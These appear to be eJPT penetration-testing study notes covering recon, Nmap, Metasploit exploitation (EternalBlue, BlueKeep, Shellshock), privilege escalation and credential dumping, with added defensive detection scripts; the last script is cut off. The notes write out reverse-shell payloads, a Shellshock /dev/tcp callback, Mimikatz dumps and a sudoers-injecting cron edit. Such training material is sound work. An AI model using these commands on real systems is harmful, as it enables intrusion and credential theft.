EJPT Notes

Assessment Methodologies

Passive Information Gathering

Website Recon & Footprinting
  IP Addresses → host <domain>
  Directories → robots.txt, sitemap.xml
  Names, Emails, Phone Numbers, Physical Addresses
  Web Technologies Used
    BuiltWith → Firefox Addon (Recommended)
    Wappalyzer → Extension
    whatweb <domain> → Linux Tool
    webhttrack → Website Copier

Whois Enumeration
  https://who.is website
  whois <domain>

Website Footprinting with Netcraft
  https://netcraft.com

DNS Recon
  dnsrecon -d <domain> → Kali Linux Tool
  https://dnsdumpster.com/

WAF
  wafw00f

Subdomain Enumeration
  Sublist3r

Google Dorks
  cache:ine.com
  Exploit-DB Dorks

Email Harvesting
  theHarvester

Leaked Password Databases
  HaveIBeenPwned?

Active Information Gathering

DNS Zone Transfer
  /etc/hosts → Local DNS
  dnsenum
  dig
  fierce
  nmap
  netdiscover

Footprinting & Scanning

Active Information Gathering

Host Discovery Techniques
  Ping Sweeps → ICMP Echo Requests → Tool: fping
    fping -a -g 10.10.23.0/24
  ARP Scanning
  TCP SYN Ping → Half-Open Scan
  UDP Ping
  TCP ACK Ping
  SYN-ACK Ping → Sends SYN-ACK packets

NMAP Scripts → /usr/share/nmap/scripts/

Firewall/IDS Evasion
  -f → Fragments IP packets
  -D → Decoy

-Pn vs -sn
  -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets → to identify targets
  -Pn → skips host discovery entirely and treats every target as online

Types of Scans:
  TCP Connect Scans (-sT)
  SYN “Half-open” Scans (-sS)
  UDP Scans (-sU)
  TCP Null Scans (-sN) → sent with no flags set at all. As per the RFC, the target host should respond with a RST if the port is closed.
  TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection). Nmap expects a RST if the port is closed.
  TCP Xmas Scans (-sX) → sends a malformed TCP packet (FIN, PSH and URG set) and expects a RST response for closed ports.
If a UDP port doesn’t respond to an Nmap scan, it will be marked as open|filtered
NULL, FIN and Xmas → Firewall Evasion
Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port, so these scans cannot tell open from closed on Windows

Zenmap:
  Green → Machine is alive
  Red → Machine is alive but not responding or not directly accessible
  Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts’ connections, with hostname and IP addresses, to localhost.

  nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery

FFUF
  You could also use any custom keyword instead of FUZZ; you just need to define it like this: wordlist.txt:KEYWORD
    ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
  Generic list of files such as raft-medium-files-lowercase.txt:
    ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
  To hide the progress: 2>/dev/null
  Directories:
    ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
  By adding -fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes.
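The scan types above are distinguished purely by which TCP flag bits the probe carries, and that is also how a capture-triage script or IDS rule recognises them on the wire. The following is an added example (not part of the original notes): it classifies packets into the Nmap scan types listed above from their flag bits, states the RFC 793 reply a closed port should give, and counts NULL/FIN/Xmas probes per source, since no normal client ever sends those combinations. The packet records are constructed sample data, and the Windows caveat from the notes applies: a host that answers every probe with RST makes these three scans inconclusive, but the probes themselves are still detectable.

```python
# Added example (not from the original notes): classify TCP probe types by their
# flag bits, the way an IDS rule or a packet-capture triage script would, and
# state what RFC 793 says a closed port should answer. Packet records below are
# constructed sample data, not captured traffic.
from dataclasses import dataclass
from collections import Counter

# TCP flag bits as laid out in the TCP header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    proto: str          # "tcp" or "udp"
    flags: int = 0      # TCP flag bits; ignored for UDP


def classify_probe(pkt: Packet) -> str:
    """Name the Nmap scan type a packet with these flags corresponds to."""
    if pkt.proto == "udp":
        return "udp (-sU)"
    f = pkt.flags & (FIN | SYN | RST | PSH | ACK | URG)
    if f == 0:
        return "null (-sN)"
    if f == FIN:
        return "fin (-sF)"
    if f == FIN | PSH | URG:
        return "xmas (-sX)"
    if f == SYN:
        return "syn (-sS or -sT first packet)"
    if f == ACK:
        return "ack (-sA / TCP ACK ping)"
    return "other"


def expected_closed_port_reply(probe: str) -> str:
    """What a standards-conforming stack sends back when the port is closed."""
    if probe.startswith(("null", "fin", "xmas", "syn", "ack")):
        return "RST"          # ACK to an unknown connection draws a RST open or closed
    if probe.startswith("udp"):
        return "ICMP port unreachable (no reply at all -> open|filtered)"
    return "unknown"


def scan_summary(packets):
    """Count probe types per source host."""
    per_src = {}
    for p in packets:
        per_src.setdefault(p.src, Counter())[classify_probe(p)] += 1
    return per_src


def stealth_scanners(packets, threshold=3):
    """Sources that sent >= threshold NULL/FIN/Xmas probes: normal clients never
    send these flag combinations, so the count is a usable detection signal."""
    out = []
    for src, counts in scan_summary(packets).items():
        stealth = sum(n for k, n in counts.items()
                      if k.startswith(("null", "fin", "xmas")))
        if stealth >= threshold:
            out.append(src)
    return sorted(out)


# Constructed sample traffic: one Xmas/NULL/FIN scanner, one normal SYN client.
SAMPLE = [
    Packet("10.0.0.9", "10.0.0.5", 22, "tcp", FIN | PSH | URG),
    Packet("10.0.0.9", "10.0.0.5", 80, "tcp", 0),
    Packet("10.0.0.9", "10.0.0.5", 443, "tcp", FIN),
    Packet("10.0.0.9", "10.0.0.5", 53, "udp"),
    Packet("10.0.0.7", "10.0.0.5", 443, "tcp", SYN),
    Packet("10.0.0.7", "10.0.0.5", 443, "tcp", ACK | PSH),
]

if __name__ == "__main__":
    for src, counts in scan_summary(SAMPLE).items():
        print(src, dict(counts))
    print("stealth scanners:", stealth_scanners(SAMPLE))
```

The threshold is deliberately low: a single NULL or Xmas packet is already anomalous, and three from one source within a capture is enough to raise an alert without waiting for a full port sweep.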
  -mc 200 → Only shows 200
  -fr → Filter regexp

Audit
  https://cisofy.com/lynis/

Penetration Testing

Windows Vulnerabilities
  Windows IIS - Port 80, 443
  WebDAV - Port 80, 443
  SMB/CIFS - Port 445
  RDP - Port 3389
  WinRM - Port 5986/443

Exploit - WebDAV IIS
  nmap -sV -p 80 --script=http-enum <target>
  hydra -L <username-list> -P <password-list> <target> http-get /webdav/
  davtest -auth user:password -url <url>
  cadaver <url> → Enter username & password
    put <webshell-path>
  Webshells → /usr/share/webshells
  dir C:/ & type C:/<filepath>
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
  service postgresql start && msfconsole
  use multi/handler → Used to set up a listener for the payload you created with msfvenom
  set payload windows/meterpreter/reverse_tcp
  show options
  set LHOST & LPORT & run

Exploit - SMB : PSExec
  nmap -sV -sC <target>
  scanner/smb/smb_login
  psexec.py [email protected]
  Usernames: /usr/share/metasploit-framework/data/wordlists/common_users.txt
  exploit/windows/smb/psexec

Exploit - SMB : EternalBlue (MS17-010)
  https://github.com/3ndG4me/AutoBlue-MS17-010
  cd Shellcode
  ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless
  nc -lvnp 1234
  python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin
  Method 2 : Metasploit
    use windows/smb/ms17_010_eternalblue

Exploit - RDP
  use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP
  hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
  xfreerdp /u:<username> /p:<password> /v:<target>:<port>

Exploit - WinRM
  Port → 5985
  crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>
  crackmapexec winrm <target> -u <username> -p <password> -x <command>
  evil-winrm.rb -u <username> -p <password> -i <target>
  use exploit/windows/winrm/winrm_script_exec
  set FORCE_VBS true
  set username & password
  exploit

  > use auxiliary/scanner/winrm/winrm_auth_methods
  > use auxiliary/scanner/winrm/winrm_login
  > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  > set VERBOSE false
  > use auxiliary/scanner/winrm/winrm_cmd
  > set USERNAME administrator
  > set PASSWORD tinkerbell
  > set cmd whoami
  > run
  > use exploit/windows/winrm/winrm_script_exec
  > set USERNAME <>
  > set PASSWORD <>
  > set LHOST <IP>
  > set FORCE_VBS true
  > run
  > sysinfo

Privilege Escalation Windows
  Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
    Copy sysinfo output to a txt file
    ./windows-exploit-suggester.py --update
    ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file>
  Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits
    Download the specific exploit
    Upload this exploit using the Meterpreter shell → .\<exploit>.exe
  Meterpreter → getsystem → Escalate Privileges
  use multi/recon/local_exploit_suggester → To find out which exploits the target is vulnerable to

Exploit - UAC
  UAC → User Account Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS
  It ensures that changes to the OS require approval from an admin or a user account that is part of the admin group
  https://github.com/hfiref0x/UACME
  net users
  net localgroup administrators
  use exploit/windows/http/rejetto_hfs_exec
  pgrep explorer → PID
  migrate <PID> → Change x86 to x64
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
  upload backdoor.exe
  upload /root/Desktop/Tools/UACME/Akagi64.exe
  .\Akagi64.exe 23 C:\Temp\backdoor.exe

Enumeration

Importing Nmap results into MSF
  service postgresql start
  msfconsole
  msf> db_status
  msf> workspace
  msf> workspace -a <name>              // Create a new workspace
  msf> db_import <path_to_file>
  msf> hosts                            // Check whether the data imported successfully
  msf> services                         // Check whether the data imported successfully
  msf> db_nmap -Pn -sV -O 10.4.22.173   // Results will be saved in the MSF DB

Port Scanning with Auxiliary Modules
  service postgresql start
  msfconsole
  msf> workspace -a portscan
  msf> search portscan
  msf> use <module_name> / <index>      // scanner/portscan/tcp
  msf> show options
  msf> set RHOSTS 192.168.100.43        // TARGET IP
  msf> curl <>                          // If HTTP is open
  msf> search xoda
  msf> use <index/module_name>
  msf> show options
  msf> set RHOSTS <TARGET IP>
  msf> set TARGETURI /                  // Set the path where the service is hosted
  msf> exploit                          // It will give a meterpreter session
  mp> sysinfo                           // Target information
  mp> shell                             // Open shell session
  bash> ifconfig                        // Identify next target address (x.x.x.x+1)
  bash> exit                            // CTRL + C
  mp> run autoroute -s <IP>             // IP of one of the machines in the subnet → Add route
  mp> background                        // Will put this session in the background
  msf> sessions                         // View current sessions
  msf> search portscan
  msf> set RHOSTS <TARGET_2>            // Target 1+1 (x.x.x.x+1)
  msf> run
  msf> back
  msf> search udp_sweep

  ERROR: [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
  SOLUTION: set LHOST <BASE_MACHINE_IP>   // Attacker IP

FTP Enumeration
  msf> search type:auxiliary name:ftp
  msf> use auxiliary/scanner/ftp/ftp_version
  msf> use auxiliary/scanner/ftp/ftp_login
  msf> set RHOSTS <IP>
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> run
  msf> use auxiliary/scanner/ftp/anonymous

SMB Enumeration
  msf> setg RHOSTS <IP>   // Setting a global variable
  msf> search type:auxiliary name:smb
  msf> use auxiliary/scanner/smb/smb_version
  msf> use auxiliary/scanner/smb/smb_enumusers
  msf> info                // See info about the module
  msf> use auxiliary/scanner/smb/smb_enumshares
  msf> set ShowFiles true
  msf> use auxiliary/scanner/smb/smb_login
  msf> set SMB_USER admin
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  bash> smbclient -L \\\\<IP>\\ -U admin        // -L: List all shares
  bash> smbclient \\\\<IP>\\<share> -U admin    // Replace share name

Web Server Enumeration
  msf> setg RHOSTS <IP>
  msf> setg RHOST <IP>
  msf> search type:auxiliary name:http
  msf> use auxiliary/scanner/http/http_version
  msf> use auxiliary/scanner/http/http_header
  msf> use auxiliary/scanner/http/robots_txt
  msf> use auxiliary/scanner/http/dir_scanner
  msf> use auxiliary/scanner/http/files_dir
  msf> use auxiliary/scanner/http/http_login
  msf> set AUTH_URI <dir>   // Replace with the directory whose credentials you want to bruteforce
  msf> unset USERPASS_FILE
  msf> run
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> set VERBOSE false
  msf> run
  msf> use auxiliary/scanner/http/apache_userdir_enum
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> echo "<username>" > user.txt
  msf> use auxiliary/scanner/http/http_login
  msf> set USER_FILE /root/user.txt

MySQL Enumeration   // MySQL - TCP Port 3306
  msf> use auxiliary/scanner/mysql/mysql_version
  msf> use auxiliary/scanner/mysql/mysql_login
  msf> set USERNAME root
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> set VERBOSE false
  msf> run                      // It will bruteforce passwords
  // auxiliary/admin/ → These admin modules require credentials
  msf> use auxiliary/admin/mysql/mysql_enum
  msf> set PASSWORD <password>  // This module requires creds
  msf> set USERNAME root
  msf> run
  msf> use auxiliary/admin/mysql/mysql_sql
  msf> set USERNAME root
  msf> set PASSWORD <password>
  msf> set SQL show databases;
  msf> use auxiliary/scanner/mysql/mysql_schemadump
  msf> set USERNAME root
  msf> set PASSWORD <password>
  bash> mysql -h <IP> -u root -p

SSH Enumeration
  msf> search type:auxiliary name:ssh
  msf> use auxiliary/scanner/ssh/ssh_version
  msf> use auxiliary/scanner/ssh/ssh_login          // Password Auth
  msf> use auxiliary/scanner/ssh/ssh_login_pubkey   // Key-Pair Auth
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
  msf> sessions <number>
  msf> /bin/bash -i
  bash> ls
  msf> use auxiliary/scanner/ssh/ssh_enumusers
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

SMTP Enumeration
  msf> search type:auxiliary name:smtp
  msf> use auxiliary/scanner/smtp/smtp_version
  msf> use auxiliary/scanner/smtp/smtp_enum

Vulnerability Assessment

Frequently Exploited Windows Services
  Microsoft IIS → Port 80/443 → Web Server
  WebDAV → Port 80/443 → HTTP extension that allows clients to update, delete, move & copy files on the web server
  SMB/CIFS → Port 445 → Network file sharing protocol
  RDP → Port 3389 → Remotely authenticate & interact with a Windows system
  WinRM → Port 5986/443 → Windows remote management protocol

MSF Vulnerability Scanning
  bash> searchsploit "Microsoft Windows SMB"
  bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
  metasploit-autopwn
    > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb
    > mv db_autopwn.rb /usr/share/metasploit-framework/
    > load db_autopwn   (msf)
    > db_autopwn -p -t
    > db_autopwn -p -t -PI 445
    > analyze

MS17-010 SMB Vulnerability (EternalBlue Exploit)
  EternalBlue → Collection of Windows vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows system
  Affected Versions: Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016
  > nmap -sV -p 445 -O <IP>
  > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
  > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
  > cd <DIR>
  > pip install -r requirements.txt
  > cd shellcode && chmod +x shell_prep.sh
  > ./shell_prep.sh   // 1. Type Y  2. Enter LHOST IP  3. Enter LHOST port  4. Type 1 (Regular CMD Shell)  5. Type 1 (Stageless payload) → sc_x86.bin / sc_x64.bin
  > cd ..
  > chmod +x eternalblue_exploit7.py
  > nc -nvlp 1234
  > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
  // Method 2
  msf> search eternalblue
  msf> use exploit/windows/smb/ms17_010_eternalblue
  msf> set RHOSTS <IP>

BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)
  Allows attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of
  > sudo nmap -p <IP>
  msf> search BlueKeep
  msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  msf> set RHOSTS <IP>
  msf> run
  msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  msf> set RHOSTS
  msf> exploit

PassTheHash Attack
  msf> service postgresql start && msfconsole
  msf> search badblue
  msf> use exploit/windows/http/badblue_passthru
  msf> set RHOSTS <IP>
  msf> exploit
  mp> pgrep lsass
  mp> migrate 780
  mp> getuid
  mp> load kiwi
  mp> lsa_dump_sam   // Administrative NTLM creds
  msf> use exploit/windows/smb/psexec
  msf> set LPORT <PORT>
  msf> set RHOSTS <IP>
  msf> set SMBUser Administrator
  msf> set SMBPass <LMHash>:<NTLM Hash>
  msf> set target Native\ upload
  msf> exploit
  // Method 2
  > crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
  > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"

Shellshock (Bash CVE-2014-6271 Vulnerability)
  Allows an attacker to execute arbitrary remote commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.
  > nmap -sV <IP>
  > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
  > Capture this request in Burp
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
  > nc -nvlp 1234
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
  msf> search shellshock
  msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
  msf> set RHOSTS <IP>
  msf> set TARGETURI /gettime.cgi
  msf> exploit

Vulnerability Scanning

Nessus
  sudo dpkg -i Nessus.deb   // Download from the Nessus website
  sudo systemctl start nessusd.service

WMAP
  msf> setg RHOSTS <IP>
  msf> load wmap
  msf> wmap_sites -a <IP>
  msf> wmap_targets -t http://<IP>
  msf> wmap_sites -l
  msf> wmap_targets -l
  msf> wmap_run -t

Windows Privilege Escalation

Windows Kernel Exploits
  Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits
  msf> getsystem   // command to run privilege escalation
  msf> use post/multi/recon/local_exploit_suggester
  msf> set SESSION <Number>
  msf> run

Bypassing User Account Control (UAC)
  In order to bypass UAC, you need to have access to a user account that is a part of the local administrators group on the Windows target system.
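What makes the Shellshock requests above recognisable is not the command after the header but the prefix: a vulnerable bash treats any environment variable whose value starts with "() {" as a function definition, and a CGI server copies client headers into environment variables. The following is an added example (not from the original notes) of detection logic for that signature, run over constructed Apache-style log lines. The log format, field names and sample IPs are assumptions for the example; the pattern it matches is the one the notes show.

```python
# Added example (not from the original notes): detection logic for the
# Shellshock (CVE-2014-6271) probe pattern, run over constructed sample
# web-server log lines. The signature is the function-export prefix "() {"
# in a client-supplied value, not any particular command after it.
import re
from typing import Dict, List

# Function-export prefix; whitespace tolerated between tokens, which is what
# a loose IDS content rule also allows.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format: ... "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into fields; {} if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def is_shellshock_probe(entry: Dict[str, str]) -> bool:
    """True if any client-controlled field carries the function-export prefix.
    User-Agent, Referer and the request line all end up in CGI env vars."""
    return any(SHELLSHOCK_RE.search(entry.get(k, "")) for k in ("ua", "referer", "req"))


def cgi_targeted(entry: Dict[str, str]) -> bool:
    """Requests aimed at CGI handlers are where the env-var path into bash exists."""
    req = entry.get("req", "")
    return "/cgi-bin/" in req or ".cgi" in req


def detect(lines: List[str]):
    """Return (ip, request, reason) for each line that looks like a Shellshock attempt."""
    hits = []
    for line in lines:
        e = parse_log_line(line)
        if not e or not is_shellshock_probe(e):
            continue
        reason = "shellshock pattern in header"
        if cgi_targeted(e):
            reason += " against CGI endpoint"
        hits.append((e["ip"], e["req"], reason))
    return hits


# Constructed sample log lines (not real traffic). Lines 1-2 are probes; line 4
# has parentheses and a brace in the UA but not the "() {" sequence, so it is benign.
SAMPLE_LOG = [
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET /gettime.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/bash -c \'id\'"',
    '10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.88"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /docs/bash.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; bot) {}"',
]

if __name__ == "__main__":
    for ip, req, reason in detect(SAMPLE_LOG):
        print(f"{ip}  {req!r}  {reason}")
```

Because the check is on the prefix, it also catches variants that put the payload in Referer, Cookie or a custom header, provided those headers are logged; the real fix is the patched bash, which no longer imports functions from arbitrary environment variables.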
  UACMe: https://github.com/hfiref0x/UACME
  > net users
  > net localgroup administrators
  > setg RHOSTS <IP>
  > search rejetto
  > run
  > sysinfo          // 32-bit mp session
  > pgrep explorer
  > migrate <ID>
  > sysinfo          // 64-bit mp session
  > shell
  > net user
  > net localgroup administrators
  // MSF : UACME
  > use multi/handler
  > set payload windows/meterpreter/reverse_tcp
  > set LHOST <IP>
  > set LPORT <Port>
  > run
  // Create Payload
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe > backdoor.exe
  // Continue Previous Session
  > pwd
  > getuid
  > getprivs
  > cd C:\\
  > mkdir temp
  > cd temp
  > upload backdoor.exe
  > upload /root/Desktop/tools/UACME/Akagi64.exe
  > shell
  > dir
  > Akagi64.exe 23 C:\\temp\backdoor.exe   // It will connect back to the listener
  > getuid
  > getprivs
  > getsystem
  > hashdump

Access Control Impersonation
  Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system.
  Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & include the identity & privileges of the user account associated with the thread or process.
  Privileges:
    SeAssignPrimaryToken: This allows a user to impersonate tokens
    SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
    SeImpersonatePrivilege: This allows a user to create a process under the security context of another user, typically with administrative privileges.
  > nmap <IP>
  > search rejetto
  > set RHOSTS <IP>
  > exploit
  > sysinfo
  > pgrep explorer
  > migrate <ID>
  > getuid
  > getprivs
  > use incognito
  > list_tokens -u
  > impersonate_token <Name>
  > getuid
  > pgrep explorer
  > migrate <ID>

Alternate Data Streams (ADS)
  ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS
  Any file created on an NTFS drive will have two different forks/streams:
    Data Stream → Default stream that contains the data of the file
    Resource Stream → Typically contains metadata of the file
  Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection

Unattended Windows Setup
  Config Files:
    C:\Windows\Panther\Unattend.xml
    C:\Windows\Panther\Autounattend.xml
  > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
  > python -m SimpleHTTPServer 80
  // Windows
  > cd Desktop
  > certutil -urlcache -f http://<Kali>/payload.exe payload.exe
  > msfconsole
  > use multi/handler
  > set payload windows/x64/meterpreter/reverse_tcp
  > set LHOST <IP>
  > set LPORT 1234
  > run
  // Execute the payload in Windows
  > search -f unattend.xml
  > cd C:\\Windows\\Panther
  > download unattend.xml
  > vim password.txt
  > base64 -d password.txt
  > psexec.py Administrator@<IP>   // Enter password
  // Windows:
  > runas.exe /user:Administrator cmd   // Enter password

Dumping Hashes with Mimikatz
  Mimikatz: Windows post-exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickets from memory.
  > nmap -sV <IP>
  > msfconsole
  > search badblue
  > use exploit/windows/http/badblue_passthru
  > set RHOSTS <IP>
  > exploit
  > sysinfo
  > getuid
  > pgrep lsass
  > migrate <ID>
  > getuid
  > load kiwi
  > ?                   // Help Menu
  > creds_all           // Dump all creds
  > lsa_dump_sam
  > lsa_dump_secrets
  > cd C:\\
  > mkdir Temp
  > cd Temp
  > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
  > shell
  > dir
  > mimikatz.exe
  > privilege::debug
  > lsadump::sam
  > lsadump::secrets
  > sekurlsa::logonpasswords

Linux Exploits

FTP
  > nmap -sV <IP>
  > ftp <IP>   // Check anonymous login
  > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
  > searchsploit proftpd

SSH
  > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh

SAMBA
  SAMBA is a Linux implementation of SMB
  SAMBA allows Windows systems to access Linux shares & devices
  > nmap -sV <IP>
  > hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
  > smbmap -H <IP> -u admin -p <password>
  > smbclient -L <IP> -U admin
  > smbclient //<IP>/shawn -U admin
  > ?
  > dir
  > smbclient //<IP>/nancy -U admin
  > get flag
  > ls
  > cat flag
  > smbclient //<IP>/admin -U admin
  > tar xzf flag.tar.gz
  > cat flag
  > enum4linux -a <IP>
  > enum4linux -a -u admin -p <password> <IP>

Linux Privilege Escalation

Linux Kernel Exploits
  Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester
  > sysinfo
  > getuid
  > shell
  > /bin/bash -i
  > cat /etc/passwd
  // Quick Download: Linux Exploit Suggester
  > chmod +x les.sh
  > ./les.sh

Misconfigured Cron Jobs
  Cron → Time-based service that runs applications, scripts & other commands repeatedly on a specific schedule
  In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user, or the files being processed by the cron job
  > whoami
  > groups <user>
  > cat /etc/passwd
  > crontab -l   // List crontab for current user
  > ls -la
  > cd /
  > grep -rnw /usr -e "/home/student/message"
  > cat /tmp/message
  > ls -la /usr/local/share/copy.sh
  > cat /usr/local/share/copy.sh
  > printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
  > sudo su

SUID Binaries
  SUID → Set Owner User ID permission
  This permission provides users with the ability to execute a script or binary with the permissions of the file owner, as opposed to the user that is running the script or binary
  SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions.
  The provision of elevated privileges is limited to the execution of the script & does not translate to a general elevation of privileges.
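Both of the misconfigurations in the last two sections (a root cron job that runs a script other users can write to, and SUID files) are things an administrator can audit for before anyone else finds them. The following is an added example (not from the original notes) that parses /etc/crontab-style entries, checks the referenced scripts for group/world write permission, and lists SUID files under a directory. The crontab text and the files it points at are constructed in a temporary directory here so the example runs offline; the path names mirror the ones in the notes but are placeholders.

```python
# Added example (not from the original notes): a small audit that finds the two
# cron misconfigurations the notes describe: a root cron job that runs a script
# which other users can write to, and SUID files. The crontab text and the
# files it points at are constructed in a temporary directory here, so this
# runs offline without touching the real /etc/crontab.
import os
import stat
import tempfile


def parse_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style lines (5 time
    fields, user, command). Comments, blanks and VAR=value lines are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):            # @reboot / @daily shortcuts: 3 fields
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def script_path(command):
    """First token of the command that looks like an absolute path."""
    for tok in command.split():
        if tok.startswith("/"):
            return tok
    return None


def writable_by_others(path):
    """True if group or world have write permission on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(crontab_text, root_fs="/"):
    """Return (path, mode) for root cron jobs whose script is writable by
    non-owners. root_fs lets the demo point at a scratch directory instead of /."""
    findings = []
    for user, command in parse_crontab(crontab_text):
        path = script_path(command)
        if user != "root" or path is None:
            continue
        real = os.path.join(root_fs, path.lstrip("/"))
        if os.path.isfile(real) and writable_by_others(real):
            findings.append((path, oct(os.stat(real).st_mode & 0o777)))
    return findings


def find_suid(directory):
    """List files under directory with the SUID bit set (what `find -perm -4000` shows)."""
    hits = []
    for dirpath, _, files in os.walk(directory):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.stat(p)
            except OSError:
                continue
            if st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(p, directory))
    return sorted(hits)


def demo():
    """Build a scratch tree with one writable cron script and one SUID file."""
    root = tempfile.mkdtemp()
    share = os.path.join(root, "usr/local/share")
    os.makedirs(share)
    bad = os.path.join(share, "copy.sh")       # constructed, mirrors the notes
    good = os.path.join(share, "backup.sh")    # constructed control file
    for p in (bad, good):
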